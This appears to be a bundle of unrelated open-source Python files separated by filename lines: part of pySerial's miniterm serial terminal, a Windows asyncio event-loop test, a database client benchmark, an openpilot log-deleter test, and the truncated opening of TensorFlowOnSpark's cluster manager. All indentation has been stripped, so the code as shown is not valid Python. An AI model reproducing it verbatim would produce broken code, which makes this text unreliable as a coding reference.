sys.stderr.write('--- EOL: {} ---\n'.format(self.eol.upper()))
self.update_transformations()
elif c == '\x01': # CTRL+A -> set encoding
self.change_encoding()
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
#~ elif c == '\x01': # CTRL+A -> cycle escape mode
#~ elif c == '\x0c': # CTRL+L -> cycle linefeed mode
elif c in 'pP': # P -> change port
self.change_port()
elif c in 'sS': # S -> suspend / open port temporarily
self.suspend_port()
elif c in 'bB': # B -> change baudrate
self.change_baudrate()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
elif c == '7': # 7 -> change to 8 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
elif c in 'sS': # S -> change to space parity
self.serial.parity = serial.PARITY_SPACE
self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
elif c == '1': # 1 -> change to 1 stop bits
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
else:
sys.stderr.write('--- unknown menu character {} --\n'.format(key_description(c)))
def upload_file(self):
"""Ask user for filenname and send its contents"""
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
with self.console:
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
with open(filename, 'rb') as f:
sys.stderr.write('--- Sending file {} ---\n'.format(filename))
while True:
block = f.read(1024)
if not block:
break
self.serial.write(block)
# Wait for output buffer to drain.
self.serial.flush()
sys.stderr.write('.') # Progress indicator.
sys.stderr.write('\n--- File {} sent ---\n'.format(filename))
except IOError as e:
sys.stderr.write('--- ERROR opening file {}: {} ---\n'.format(filename, e))
def change_filter(self):
"""change the i/o transformations"""
sys.stderr.write('\n--- Available Filters:\n')
sys.stderr.write('\n'.join(
'--- {:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n--- Enter new filter name(s) [{}]: '.format(' '.join(self.filters)))
with self.console:
new_filters = sys.stdin.readline().lower().split()
if new_filters:
for f in new_filters:
if f not in TRANSFORMATIONS:
sys.stderr.write('--- unknown filter: {}\n'.format(repr(f)))
break
else:
self.filters = new_filters
self.update_transformations()
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def change_encoding(self):
"""change encoding on the serial port"""
sys.stderr.write('\n--- Enter new encoding name [{}]: '.format(self.input_encoding))
with self.console:
new_encoding = sys.stdin.readline().strip()
if new_encoding:
try:
codecs.lookup(new_encoding)
except LookupError:
sys.stderr.write('--- invalid encoding name: {}\n'.format(new_encoding))
else:
self.set_rx_encoding(new_encoding)
self.set_tx_encoding(new_encoding)
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
def change_baudrate(self):
"""change the baudrate"""
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
with self.console:
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError as e:
sys.stderr.write('--- ERROR setting baudrate: {} ---\n'.format(e))
self.serial.baudrate = backup
else:
self.dump_port_settings()
def change_port(self):
"""Have a conversation with the user to change the serial port"""
with self.console:
try:
port = ask_for_port()
except KeyboardInterrupt:
port = None
if port and port != self.serial.port:
# reader thread needs to be shut down
self._stop_reader()
# save settings
settings = self.serial.getSettingsDict()
try:
new_serial = serial.serial_for_url(port, do_not_open=True)
# restore settings and open
new_serial.applySettingsDict(settings)
new_serial.rts = self.serial.rts
new_serial.dtr = self.serial.dtr
new_serial.open()
new_serial.break_condition = self.serial.break_condition
except Exception as e:
sys.stderr.write('--- ERROR opening new port: {} ---\n'.format(e))
new_serial.close()
else:
self.serial.close()
self.serial = new_serial
sys.stderr.write('--- Port changed to: {} ---\n'.format(self.serial.port))
# and restart the reader thread
self._start_reader()
def suspend_port(self):
"""\
open port temporarily, allow reconnect, exit and port change to get
out of the loop
"""
# reader thread needs to be shut down
self._stop_reader()
self.serial.close()
sys.stderr.write('\n--- Port closed: {} ---\n'.format(self.serial.port))
do_change_port = False
while not self.serial.is_open:
sys.stderr.write('--- Quit: {exit} | p: port change | any other key to reconnect ---\n'.format(
exit=key_description(self.exit_character)))
k = self.console.getkey()
if k == self.exit_character:
self.stop() # exit app
break
elif k in 'pP':
do_change_port = True
break
try:
self.serial.open()
except Exception as e:
sys.stderr.write('--- ERROR opening port: {} ---\n'.format(e))
if do_change_port:
self.change_port()
else:
# and restart the reader thread
self._start_reader()
sys.stderr.write('--- Port opened: {} ---\n'.format(self.serial.port))
def get_help_text(self):
"""return the help text"""
# help text, starts with blank line!
return """
--- pySerial ({version}) - miniterm - help
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {info:7} Show info
--- {upload:7} Upload file (prompt will be shown)
--- {repr:7} encoding
--- {filter:7} edit filters
--- Toggles:
--- {rts:7} RTS {dtr:7} DTR {brk:7} BREAK
--- {echo:7} echo {eol:7} EOL
---
--- Port settings ({menu} followed by the following):
--- p change port
--- 7 8 set data bits
--- N E O S M change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""".format(version=getattr(serial, 'VERSION', 'unknown version'),
exit=key_description(self.exit_character),
menu=key_description(self.menu_character),
rts=key_description('\x12'),
dtr=key_description('\x04'),
brk=key_description('\x02'),
echo=key_description('\x05'),
info=key_description('\x09'),
upload=key_description('\x15'),
repr=key_description('\x01'),
filter=key_description('\x06'),
eol=key_description('\x0c'))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# default args can be used to override when calling main() from an other script
# e.g to create a miniterm-my-device.py
def main(default_port=None, default_baudrate=9600, default_rts=None, default_dtr=None):
"""Command line tool, entry point"""
import argparse
parser = argparse.ArgumentParser(
description="Miniterm - A simple terminal program for the serial port.")
parser.add_argument(
"port",
nargs='?',
help="serial port name ('-' to show port list)",
default=default_port)
parser.add_argument(
"baudrate",
nargs='?',
type=int,
help="set baud rate, default: %(default)s",
default=default_baudrate)
group = parser.add_argument_group("port settings")
group.add_argument(
"--parity",
choices=['N', 'E', 'O', 'S', 'M'],
type=lambda c: c.upper(),
help="set parity, one of {N E O S M}, default: N",
default='N')
group.add_argument(
"--rtscts",
action="store_true",
help="enable RTS/CTS flow control (default off)",
default=False)
group.add_argument(
"--xonxoff",
action="store_true",
help="enable software flow control (default off)",
default=False)
group.add_argument(
"--rts",
type=int,
help="set initial RTS line state (possible values: 0, 1)",
default=default_rts)
group.add_argument(
"--dtr",
type=int,
help="set initial DTR line state (possible values: 0, 1)",
default=default_dtr)
group.add_argument(
"--ask",
action="store_true",
help="ask again for port when open fails",
default=False)
group = parser.add_argument_group("data handling")
group.add_argument(
"-e", "--echo",
action="store_true",
help="enable local echo (default off)",
default=False)
group.add_argument(
"--encoding",
dest="serial_port_encoding",
metavar="CODEC",
help="set the encoding for the serial port (e.g. hexlify, Latin1, UTF-8), default: %(default)s",
default='UTF-8')
group.add_argument(
"-f", "--filter",
action="append",
metavar="NAME",
help="add text transformation",
default=[])
group.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="end of line mode",
default='CRLF')
group.add_argument(
"--raw",
action="store_true",
help="Do no apply any encodings/transformations",
default=False)
group = parser.add_argument_group("hotkeys")
group.add_argument(
"--exit-char",
type=int,
metavar='NUM',
help="Unicode of special character that is used to exit the application, default: %(default)s",
default=0x1d) # GS/CTRL+]
group.add_argument(
"--menu-char",
type=int,
metavar='NUM',
help="Unicode code of special character that is used to control miniterm (menu), default: %(default)s",
default=0x14) # Menu: CTRL+T
group = parser.add_argument_group("diagnostics")
group.add_argument(
"-q", "--quiet",
action="store_true",
help="suppress non-error messages",
default=False)
group.add_argument(
"--develop",
action="store_true",
help="show Python traceback on error",
default=False)
args = parser.parse_args()
if args.menu_char == args.exit_char:
parser.error('--exit-char can not be the same as --menu-char')
if args.filter:
if 'help' in args.filter:
sys.stderr.write('Available filters:\n')
sys.stderr.write('\n'.join(
'{:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n')
sys.exit(1)
filters = args.filter
else:
filters = ['default']
while True:
# no port given on command line -> ask user now
if args.port is None or args.port == '-':
try:
args.port = ask_for_port()
except KeyboardInterrupt:
sys.stderr.write('\n')
parser.error('user aborted and port is not given')
else:
if not args.port:
parser.error('port is not given')
try:
serial_instance = serial.serial_for_url(
args.port,
args.baudrate,
parity=args.parity,
rtscts=args.rtscts,
xonxoff=args.xonxoff,
do_not_open=True)
if not hasattr(serial_instance, 'cancel_read'):
# enable timeout for alive flag polling if cancel_read is not available
serial_instance.timeout = 1
if args.dtr is not None:
if not args.quiet:
sys.stderr.write('--- forcing DTR {}\n'.format('active' if args.dtr else 'inactive'))
serial_instance.dtr = args.dtr
if args.rts is not None:
if not args.quiet:
sys.stderr.write('--- forcing RTS {}\n'.format('active' if args.rts else 'inactive'))
serial_instance.rts = args.rts
serial_instance.open()
except serial.SerialException as e:
sys.stderr.write('could not open port {}: {}\n'.format(repr(args.port), e))
if args.develop:
raise
if not args.ask:
sys.exit(1)
else:
args.port = '-'
else:
break
miniterm = Miniterm(
serial_instance,
echo=args.echo,
eol=args.eol.lower(),
filters=filters)
miniterm.exit_character = unichr(args.exit_char)
miniterm.menu_character = unichr(args.menu_char)
miniterm.raw = args.raw
miniterm.set_rx_encoding(args.serial_port_encoding)
miniterm.set_tx_encoding(args.serial_port_encoding)
if not args.quiet:
sys.stderr.write('--- Miniterm on {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits} ---\n'.format(
p=miniterm.serial))
sys.stderr.write('--- Quit: {} | Menu: {} | Help: {} followed by {} ---\n'.format(
key_description(miniterm.exit_character),
key_description(miniterm.menu_character),
key_description(miniterm.menu_character),
key_description('\x08')))
miniterm.start()
try:
miniterm.join(True)
except KeyboardInterrupt:
pass
if not args.quiet:
sys.stderr.write("\n--- exit ---\n")
miniterm.join()
miniterm.close()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
main()
|
test_windows_events.py
|
import os
import signal
import socket
import sys
import time
import threading
import unittest
from unittest import mock
if sys.platform != 'win32':
raise unittest.SkipTest('Windows only')
import _overlapped
import _winapi
import asyncio
from asyncio import windows_events
from test.test_asyncio import utils as test_utils
def tearDownModule():
asyncio.set_event_loop_policy(None)
class UpperProto(asyncio.Protocol):
def __init__(self):
self.buf = []
def connection_made(self, trans):
self.trans = trans
def data_received(self, data):
self.buf.append(data)
if b'\n' in data:
self.trans.write(b''.join(self.buf).upper())
self.trans.close()
class ProactorLoopCtrlC(test_utils.TestCase):
def test_ctrl_c(self):
def SIGINT_after_delay():
time.sleep(0.1)
signal.raise_signal(signal.SIGINT)
thread = threading.Thread(target=SIGINT_after_delay)
loop = asyncio.new_event_loop()
try:
# only start the loop once the event loop is running
loop.call_soon(thread.start)
loop.run_forever()
self.fail("should not fall through 'run_forever'")
except KeyboardInterrupt:
pass
finally:
self.close_loop(loop)
thread.join()
class ProactorMultithreading(test_utils.TestCase):
def test_run_from_nonmain_thread(self):
finished = False
async def coro():
await asyncio.sleep(0)
def func():
nonlocal finished
loop = asyncio.new_event_loop()
loop.run_until_complete(coro())
# close() must not call signal.set_wakeup_fd()
loop.close()
finished = True
thread = threading.Thread(target=func)
thread.start()
thread.join()
self.assertTrue(finished)
class ProactorTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = asyncio.ProactorEventLoop()
self.set_event_loop(self.loop)
def test_close(self):
a, b = socket.socketpair()
trans = self.loop._make_socket_transport(a, asyncio.Protocol())
f = asyncio.ensure_future(self.loop.sock_recv(b, 100), loop=self.loop)
trans.close()
self.loop.run_until_complete(f)
self.assertEqual(f.result(), b'')
b.close()
def test_double_bind(self):
ADDRESS = r'\\.\pipe\test_double_bind-%s' % os.getpid()
server1 = windows_events.PipeServer(ADDRESS)
with self.assertRaises(PermissionError):
windows_events.PipeServer(ADDRESS)
server1.close()
def test_pipe(self):
res = self.loop.run_until_complete(self._test_pipe())
self.assertEqual(res, 'done')
async def _test_pipe(self):
ADDRESS = r'\\.\pipe\_test_pipe-%s' % os.getpid()
with self.assertRaises(FileNotFoundError):
await self.loop.create_pipe_connection(
asyncio.Protocol, ADDRESS)
[server] = await self.loop.start_serving_pipe(
UpperProto, ADDRESS)
self.assertIsInstance(server, windows_events.PipeServer)
clients = []
for i in range(5):
stream_reader = asyncio.StreamReader(loop=self.loop)
protocol = asyncio.StreamReaderProtocol(stream_reader,
loop=self.loop)
trans, proto = await self.loop.create_pipe_connection(
lambda: protocol, ADDRESS)
self.assertIsInstance(trans, asyncio.Transport)
self.assertEqual(protocol, proto)
clients.append((stream_reader, trans))
for i, (r, w) in enumerate(clients):
w.write('lower-{}\n'.format(i).encode())
for i, (r, w) in enumerate(clients):
response = await r.readline()
self.assertEqual(response, 'LOWER-{}\n'.format(i).encode())
w.close()
server.close()
with self.assertRaises(FileNotFoundError):
await self.loop.create_pipe_connection(
asyncio.Protocol, ADDRESS)
return 'done'
def test_connect_pipe_cancel(self):
exc = OSError()
exc.winerror = _overlapped.ERROR_PIPE_BUSY
with mock.patch.object(_overlapped, 'ConnectPipe',
side_effect=exc) as connect:
coro = self.loop._proactor.connect_pipe('pipe_address')
task = self.loop.create_task(coro)
# check that it's possible to cancel connect_pipe()
task.cancel()
with self.assertRaises(asyncio.CancelledError):
self.loop.run_until_complete(task)
def test_wait_for_handle(self):
event = _overlapped.CreateEvent(None, True, False, None)
self.addCleanup(_winapi.CloseHandle, event)
# Wait for unset event with 0.5s timeout;
# result should be False at timeout
fut = self.loop._proactor.wait_for_handle(event, 0.5)
start = self.loop.time()
done = self.loop.run_until_complete(fut)
elapsed = self.loop.time() - start
self.assertEqual(done, False)
self.assertFalse(fut.result())
# bpo-31008: Tolerate only 450 ms (at least 500 ms expected),
# because of bad clock resolution on Windows
self.assertTrue(0.45 <= elapsed <= 0.9, elapsed)
_overlapped.SetEvent(event)
# Wait for set event;
# result should be True immediately
fut = self.loop._proactor.wait_for_handle(event, 10)
start = self.loop.time()
done = self.loop.run_until_complete(fut)
elapsed = self.loop.time() - start
self.assertEqual(done, True)
self.assertTrue(fut.result())
self.assertTrue(0 <= elapsed < 0.3, elapsed)
# asyncio issue #195: cancelling a done _WaitHandleFuture
# must not crash
fut.cancel()
def test_wait_for_handle_cancel(self):
event = _overlapped.CreateEvent(None, True, False, None)
self.addCleanup(_winapi.CloseHandle, event)
# Wait for unset event with a cancelled future;
# CancelledError should be raised immediately
fut = self.loop._proactor.wait_for_handle(event, 10)
fut.cancel()
start = self.loop.time()
with self.assertRaises(asyncio.CancelledError):
self.loop.run_until_complete(fut)
elapsed = self.loop.time() - start
self.assertTrue(0 <= elapsed < 0.1, elapsed)
# asyncio issue #195: cancelling a _WaitHandleFuture twice
# must not crash
fut = self.loop._proactor.wait_for_handle(event)
fut.cancel()
fut.cancel()
def test_read_self_pipe_restart(self):
# Regression test for https://bugs.python.org/issue39010
# Previously, restarting a proactor event loop in certain states
# would lead to spurious ConnectionResetErrors being logged.
self.loop.call_exception_handler = mock.Mock()
# Start an operation in another thread so that the self-pipe is used.
# This is theoretically timing-dependent (the task in the executor
# must complete before our start/stop cycles), but in practice it
# seems to work every time.
f = self.loop.run_in_executor(None, lambda: None)
self.loop.stop()
self.loop.run_forever()
self.loop.stop()
self.loop.run_forever()
# Shut everything down cleanly. This is an important part of the
# test - in issue 39010, the error occurred during loop.close(),
# so we want to close the loop during the test instead of leaving
# it for tearDown.
#
# First wait for f to complete to avoid a "future's result was never
# retrieved" error.
self.loop.run_until_complete(f)
# Now shut down the loop itself (self.close_loop also shuts down the
# loop's default executor).
self.close_loop(self.loop)
self.assertFalse(self.loop.call_exception_handler.called)
class WinPolicyTests(test_utils.TestCase):
def test_selector_win_policy(self):
async def main():
self.assertIsInstance(
asyncio.get_running_loop(),
asyncio.SelectorEventLoop)
old_policy = asyncio.get_event_loop_policy()
try:
asyncio.set_event_loop_policy(
asyncio.WindowsSelectorEventLoopPolicy())
asyncio.run(main())
finally:
asyncio.set_event_loop_policy(old_policy)
def test_proactor_win_policy(self):
async def main():
self.assertIsInstance(
asyncio.get_running_loop(),
asyncio.ProactorEventLoop)
old_policy = asyncio.get_event_loop_policy()
try:
asyncio.set_event_loop_policy(
asyncio.WindowsProactorEventLoopPolicy())
asyncio.run(main())
finally:
asyncio.set_event_loop_policy(old_policy)
if __name__ == '__main__':
unittest.main()
|
bench_db_client.py
|
import argparse
import logging
import multiprocessing
import os
import pathlib
import random
import signal
import sys
import tempfile
import time
from eth.db.backends.level import LevelDB
from trinity.db.manager import (
DBManager,
DBClient,
)
logger = logging.getLogger('trinity.scripts.benchmark')
logger.setLevel(logging.INFO)
handler_stream = logging.StreamHandler(sys.stderr)
handler_stream.setLevel(logging.INFO)
logger.addHandler(handler_stream)
def random_bytes(num):
return random.getrandbits(8 * num).to_bytes(num, 'little')
def run_server(ipc_path):
with tempfile.TemporaryDirectory() as db_path:
db = LevelDB(db_path=db_path)
manager = DBManager(db)
with manager.run(ipc_path):
try:
manager.wait_stopped()
except KeyboardInterrupt:
pass
ipc_path.unlink()
def run_client(ipc_path, client_id, num_operations):
key_values = {
random_bytes(32): random_bytes(256)
for i in range(num_operations)
}
db_client = DBClient.connect(ipc_path)
start = time.perf_counter()
for key, value in key_values.items():
db_client.set(key, value)
db_client.get(key)
end = time.perf_counter()
duration = end - start
logger.info(
"Client %d: %d get-set per second",
client_id,
num_operations / duration,
)
parser = argparse.ArgumentParser(description='Database Manager Benchmark')
parser.add_argument(
'--num-clients',
type=int,
required=False,
default=1,
help=(
"Number of concurrent clients that should access the database"
),
)
parser.add_argument(
'--num-operations',
type=int,
required=False,
default=10000,
help=(
"Number of set+get operations that should be performed for each client"
),
)
if __name__ == '__main__':
args = parser.parse_args()
logger.info(
"Running database manager benchmark:\n - %d client(s)\n - %d get-set operations\n*****************************\n", # noqa: E501
args.num_clients,
args.num_operations,
)
with tempfile.TemporaryDirectory() as ipc_base_dir:
ipc_path = pathlib.Path(ipc_base_dir) / 'db.ipc'
server = multiprocessing.Process(target=run_server, args=[ipc_path])
clients = [
multiprocessing.Process(
target=run_client,
args=(ipc_path, client_id, args.num_operations),
) for client_id in range(args.num_clients)
]
server.start()
for client in clients:
client.start()
for client in clients:
client.join(600)
os.kill(server.pid, signal.SIGINT)
server.join(1)
logger.info('\n')
|
test_deleter.py
|
import os
import time
import threading
import unittest
from collections import namedtuple
import selfdrive.loggerd.deleter as deleter
from common.timeout import Timeout, TimeoutException
from selfdrive.loggerd.tests.loggerd_tests_common import UploaderTestCase
Stats = namedtuple("Stats", ['f_bavail', 'f_blocks', 'f_frsize'])
class TestDeleter(UploaderTestCase):
def fake_statvfs(self, d):
return self.fake_stats
def setUp(self):
self.f_type = "fcamera.hevc"
super(TestDeleter, self).setUp()
self.fake_stats = Stats(f_bavail=0, f_blocks=10, f_frsize=4096)
deleter.os.statvfs = self.fake_statvfs
deleter.ROOT = self.root
def start_thread(self):
self.end_event = threading.Event()
self.del_thread = threading.Thread(target=deleter.deleter_thread, args=[self.end_event])
self.del_thread.daemon = True
self.del_thread.start()
def join_thread(self):
self.end_event.set()
self.del_thread.join()
def test_delete(self):
f_path = self.make_file_with_data(self.seg_dir, self.f_type, 1)
self.start_thread()
with Timeout(5, "Timeout waiting for file to be deleted"):
while os.path.exists(f_path):
time.sleep(0.01)
self.join_thread()
self.assertFalse(os.path.exists(f_path), "File not deleted")
def test_delete_files_in_create_order(self):
f_path_1 = self.make_file_with_data(self.seg_dir, self.f_type)
time.sleep(1)
self.seg_num += 1
self.seg_dir = self.seg_format.format(self.seg_num)
f_path_2 = self.make_file_with_data(self.seg_dir, self.f_type)
self.start_thread()
with Timeout(5, "Timeout waiting for file to be deleted"):
while os.path.exists(f_path_1) and os.path.exists(f_path_2):
time.sleep(0.01)
self.join_thread()
self.assertFalse(os.path.exists(f_path_1), "Older file not deleted")
self.assertTrue(os.path.exists(f_path_2), "Newer file deleted before older file")
def test_no_delete_when_available_space(self):
f_path = self.make_file_with_data(self.seg_dir, self.f_type)
block_size = 4096
available = (10 * 1024 * 1024 * 1024) / block_size # 10GB free
self.fake_stats = Stats(f_bavail=available, f_blocks=10, f_frsize=block_size)
self.start_thread()
try:
with Timeout(2, "Timeout waiting for file to be deleted"):
while os.path.exists(f_path):
time.sleep(0.01)
except TimeoutException:
pass
finally:
self.join_thread()
self.assertTrue(os.path.exists(f_path), "File deleted with available space")
def test_no_delete_with_lock_file(self):
f_path = self.make_file_with_data(self.seg_dir, self.f_type, lock=True)
self.start_thread()
try:
with Timeout(2, "Timeout waiting for file to be deleted"):
while os.path.exists(f_path):
time.sleep(0.01)
except TimeoutException:
pass
finally:
self.join_thread()
self.assertTrue(os.path.exists(f_path), "File deleted when locked")
if __name__ == "__main__":
unittest.main()
|
TFCluster.py
|
# Copyright 2017 Yahoo Inc.
# Licensed under the terms of the Apache 2.0 license.
# Please see LICENSE file in the project root for terms.
"""
This module provides a high-level API to manage the TensorFlowOnSpark cluster.
There are three main phases of operation:
1. **Reservation/Startup** - reserves a port for the TensorFlow process on each executor, starts a multiprocessing.Manager to
listen for data/control messages, and then launches the Tensorflow main function on the executors.
2. **Data feeding** - *For InputMode.SPARK only*. Sends RDD data to the TensorFlow nodes via each executor's multiprocessing.Manager. PS
nodes will tie up their executors, so they won't receive any subsequent data feeding tasks.
3. **Shutdown** - sends a shutdown control message to the multiprocessing.Managers of the PS nodes and pushes end-of-feed markers into the data
queues of the worker nodes.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import nested_scopes
from __future__ import print_function
import logging
import os
import random
import sys
import threading
import time
from pyspark.streaming import DStream
from . import reservation
from . import TFManager
from . import TFSparkNode
# status of TF background job
tf_status = {}
class InputMode(object):
"""Enum for the input modes of data feeding."""
TENSORFLOW = 0 #: TensorFlow application is responsible for reading any data.
SPARK = 1 #: Spark is responsible for feeding data to the TensorFlow application via an RDD.
class TFCluster(object):
sc = None #: SparkContext
defaultFS = None #: Default FileSystem string, e.g. ``file://`` or ``hdfs://<namenode>/``
working_dir = None #: Current working directory
num_executors = None #: Number of executors in the Spark job (and therefore, the number of nodes in the TensorFlow cluster).
nodeRDD = None #: RDD representing the nodes of the cluster, i.e. ``sc.parallelize(range(num_executors), num_executors)``
cluster_id = None #: Unique ID for this cluster, used to invalidate state for new clusters.
cluster_info = None #: Cluster node reservations
cluster_meta = None #: Cluster metadata dictionary, e.g. cluster_id, defaultFS, reservation.Server address, etc.
input_mode = None #: TFCluster.InputMode for this cluster
queues = None #: *INTERNAL_USE*
server = None #: reservation.Server for this cluster
def train(self, dataRDD, num_epochs=0, qname='input'):
"""*For InputMode.SPARK only*. Feeds Spark RDD partitions into the TensorFlow worker nodes
It is the responsibility of the TensorFlow "main" function to interpret the rows of the RDD.
Since epochs are implemented via ``RDD.union()`` and the entire RDD must generally be processed in full, it is recommended
to set ``num_epochs`` to closely match your training termination condition (e.g. steps or accuracy). See ``TFNode.DataFeed``
for more details.
Args:
:dataRDD: input data as a Spark RDD.
:num_epochs: number of times to repeat the dataset during training.
:qname: *INTERNAL USE*.
"""
logging.info("Feeding training data")
assert(self.input_mode == InputMode.SPARK)
assert(qname in self.queues)
assert(num_epochs >= 0)
if isinstance(dataRDD, DStream):
# Spark Streaming
dataRDD.foreachRDD(lambda rdd: rdd.foreachPartition(TFSparkNode.train(self.cluster_info, self.cluster_meta, qname)))
else:
# Spark RDD
# if num_epochs unspecified, pick an arbitrarily "large" number for now
# TODO: calculate via dataRDD.count() / batch_size / max_steps
if num_epochs == 0:
num_epochs = 10
rdds = [dataRDD] * num_epochs
unionRDD = self.sc.union(rdds)
unionRDD.foreachPartition(TFSparkNode.train(self.cluster_info, self.cluster_meta, qname))
def inference(self, dataRDD, qname='input'):
"""*For InputMode.SPARK only*: Feeds Spark RDD partitions into the TensorFlow worker nodes and returns an RDD of results
It is the responsibility of the TensorFlow "main" function to interpret the rows of the RDD and provide valid data for the output RDD.
This will use the distributed TensorFlow cluster for inferencing, so the TensorFlow "main" function should be capable of inferencing.
Per Spark design, the output RDD will be lazily-executed only when a Spark action is invoked on the RDD.
Args:
:dataRDD: input data as a Spark RDD
:qname: *INTERNAL_USE*
Returns:
A Spark RDD representing the output of the TensorFlow inferencing
"""
logging.info("Feeding inference data")
assert(self.input_mode == InputMode.SPARK)
assert(qname in self.queues)
return dataRDD.mapPartitions(TFSparkNode.inference(self.cluster_info, qname))
def shutdown(self, ssc=None, grace_secs=0):
"""Stops the distributed TensorFlow cluster.
Args:
:ssc: *For Streaming applications only*. Spark StreamingContext
:grace_secs: Grace period to wait before terminating the Spark application, e.g. to allow the chief worker to perform any final/cleanup duties like exporting or evaluating the model.
"""
logging.info("Stopping TensorFlow nodes")
# identify ps/workers
ps_list, worker_list = [], []
for node in self.cluster_info:
(ps_list if node['job_name'] == 'ps' else worker_list).append(node)
if ssc is not None:
# Spark Streaming
while not ssc.awaitTerminationOrTimeout(1):
if self.server.done:
logging.info("Server done, stopping StreamingContext")
ssc.stop(stopSparkContext=False, stopGraceFully=True)
break
elif self.input_mode == InputMode.TENSORFLOW:
# in TENSORFLOW mode, there is no "data feeding" job, only a "start" job, so we must wait for the TensorFlow workers
# to complete all tasks, while accounting for any PS tasks which run indefinitely.
count = 0
while count < 3:
st = self.sc.statusTracker()
jobs = st.getActiveJobsIds()
if len(jobs) == 0:
break
stages = st.getActiveStageIds()
for i in stages:
si = st.getStageInfo(i)
if si.numActiveTasks == len(ps_list):
# if we only have PS tasks left, check that we see this condition a couple times
count += 1
time.sleep(5)
# shutdown queues and managers for "worker" executors.
# note: in SPARK mode, this job will immediately queue up behind the "data feeding" job.
# in TENSORFLOW mode, this will only run after all workers have finished.
workers = len(worker_list)
workerRDD = self.sc.parallelize(range(workers), workers)
workerRDD.foreachPartition(TFSparkNode.shutdown(self.cluster_info, self.queues))
time.sleep(grace_secs)
# exit Spark application w/ err status if TF job had any errors
if 'error' in tf_status:
logging.error("Exiting Spark application with error status.")
self.sc.cancelAllJobs()
self.sc.stop()
sys.exit(1)
logging.info("Shutting down cluster")
# shutdown queues and managers for "PS" executors.
# note: we have to connect/shutdown from the spark driver, because these executors are "busy" and won't accept any other tasks.
for node in ps_list:
addr = node['addr']
authkey = node['authkey']
m = TFManager.connect(addr, authkey)
q = m.get_queue('control')
q.put(None)
q.join()
# wait for all jobs to finish
while True:
time.sleep(5)
st = self.sc.statusTracker()
jobs = st.getActiveJobsIds()
if len(jobs) == 0:
break
def tensorboard_url(self):
"""Utility function to get the Tensorboard URL"""
for node in self.cluster_info:
if node['tb_port'] != 0:
return "http://{0}:{1}".format(node['host'], node['tb_port'])
return None
def run(sc, map_fun, tf_args, num_executors, num_ps, tensorboard=False, input_mode=InputMode.TENSORFLOW,
log_dir=None, driver_ps_nodes=False, master_node=None, reservation_timeout=600, queues=['input', 'output', 'error']):
"""Starts the TensorFlowOnSpark cluster and Runs the TensorFlow "main" function on the Spark executors
Args:
:sc: SparkContext
:map_fun: user-supplied TensorFlow "main" function
:tf_args: ``argparse`` args, or command-line ``ARGV``. These will be passed to the ``map_fun``.
:num_executors: number of Spark executors. This should match your Spark job's ``--num_executors``.
:num_ps: number of Spark executors which are reserved for TensorFlow PS nodes. All other executors will be used as TensorFlow worker nodes.
:tensorboard: boolean indicating if the chief worker should spawn a Tensorboard server.
:input_mode: TFCluster.InputMode
:log_dir: directory to save tensorboard event logs. If None, defaults to a fixed path on local filesystem.
:driver_ps_nodes: run the PS nodes on the driver locally instead of on the spark executors; this help maximizing computing resources (esp. GPU). You will need to set cluster_size = num_executors + num_ps
:master_node: name of the "master" or "chief" node in the cluster_template, used for `tf.estimator` applications.
:reservation_timeout: number of seconds after which cluster reservation times out (600 sec default)
:queues: *INTERNAL_USE*
Returns:
A TFCluster object representing the started cluster.
"""
logging.info("Reserving TFSparkNodes {0}".format("w/ TensorBoard" if tensorboard else ""))
assert(num_ps < num_executors)
if driver_ps_nodes and input_mode != InputMode.TENSORFLOW:
raise Exception('running PS nodes on driver locally is only supported in InputMode.TENSORFLOW')
# build a cluster_spec template using worker_nums
cluster_template = {}
cluster_template['ps'] = range(num_ps)
if master_node is None:
cluster_template['worker'] = range(num_ps, num_executors)
else:
cluster_template[master_node] = range(num_ps, num_ps + 1)
if num_executors > num_ps + 1:
cluster_template['worker'] = range(num_ps + 1, num_executors)
logging.info("cluster_template: {}".format(cluster_template))
# get default filesystem from spark
defaultFS = sc._jsc.hadoopConfiguration().get("fs.defaultFS")
# strip trailing "root" slash from "file:///" to be consistent w/ "hdfs://..."
